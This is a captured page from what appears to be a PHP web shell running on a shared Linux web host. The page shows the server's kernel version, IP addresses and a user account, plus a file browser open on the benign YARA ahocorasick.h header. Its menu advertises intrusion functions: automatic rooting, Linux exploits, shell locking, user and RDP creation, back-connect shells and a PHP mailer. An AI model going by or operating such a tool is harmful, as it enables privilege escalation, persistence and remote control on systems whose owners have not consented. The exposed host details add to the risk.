Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
include /
yara /
[ HOME SHELL ]
Name
Size
Permission
Action
ahocorasick.h
2.61
KB
-rw-r--r--
arena.h
8.74
KB
-rw-r--r--
atoms.h
3.65
KB
-rw-r--r--
base64.h
1.82
KB
-rw-r--r--
bitmask.h
3.39
KB
-rw-r--r--
compiler.h
13.5
KB
-rw-r--r--
error.h
6.73
KB
-rw-r--r--
exec.h
7.64
KB
-rw-r--r--
exefiles.h
1.71
KB
-rw-r--r--
filemap.h
2.39
KB
-rw-r--r--
hash.h
3.74
KB
-rw-r--r--
integers.h
2.99
KB
-rw-r--r--
libyara.h
3.87
KB
-rw-r--r--
limits.h
5.94
KB
-rw-r--r--
mem.h
2.03
KB
-rw-r--r--
modules.h
14.3
KB
-rw-r--r--
notebook.h
356
B
-rw-r--r--
object.h
4.24
KB
-rw-r--r--
parser.h
3.98
KB
-rw-r--r--
proc.h
2.13
KB
-rw-r--r--
re.h
5.53
KB
-rw-r--r--
rules.h
4.94
KB
-rw-r--r--
scan.h
2.01
KB
-rw-r--r--
scanner.h
3.23
KB
-rw-r--r--
simple_str.h
489
B
-rw-r--r--
sizedstr.h
2.82
KB
-rw-r--r--
stack.h
2.2
KB
-rw-r--r--
stopwatch.h
2.3
KB
-rw-r--r--
stream.h
2.05
KB
-rw-r--r--
strutils.h
2.96
KB
-rw-r--r--
threading.h
2.26
KB
-rw-r--r--
types.h
29.34
KB
-rw-r--r--
unaligned.h
2.86
KB
-rw-r--r--
utils.h
4.95
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ahocorasick.h
/* Copyright (c) 2013. The YARA Authors. All Rights Reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #ifndef _AHOCORASICK_H #define _AHOCORASICK_H #include <yara/atoms.h> #include <yara/limits.h> #include <yara/types.h> // Number of bits dedicated to store the offset of the slot relative to its // own state. #define YR_AC_SLOT_OFFSET_BITS 9 // Max number of slots in the transition table. This is the maximum number of // slots that can be addressed with 23-bit indexes. #define YR_AC_MAX_TRANSITION_TABLE_SIZE 0x800000 #define YR_AC_ROOT_STATE 0 #define YR_AC_NEXT_STATE(t) (t >> YR_AC_SLOT_OFFSET_BITS) #define YR_AC_INVALID_TRANSITION(t, c) (((t) &0x1FF) != c) #define YR_AC_MAKE_TRANSITION(state, code) \ ((YR_AC_TRANSITION)( \ (((YR_AC_TRANSITION) state) << YR_AC_SLOT_OFFSET_BITS) | (code))) int yr_ac_automaton_create(YR_ARENA* arena, YR_AC_AUTOMATON** automaton); int yr_ac_automaton_destroy(YR_AC_AUTOMATON* automaton); int yr_ac_add_string( YR_AC_AUTOMATON* automaton, YR_STRING* string, uint32_t string_idx, YR_ATOM_LIST_ITEM* atom, YR_ARENA* arena); int yr_ac_compile(YR_AC_AUTOMATON* automaton, YR_ARENA* arena); void yr_ac_print_automaton(YR_AC_AUTOMATON* automaton); #endif
Close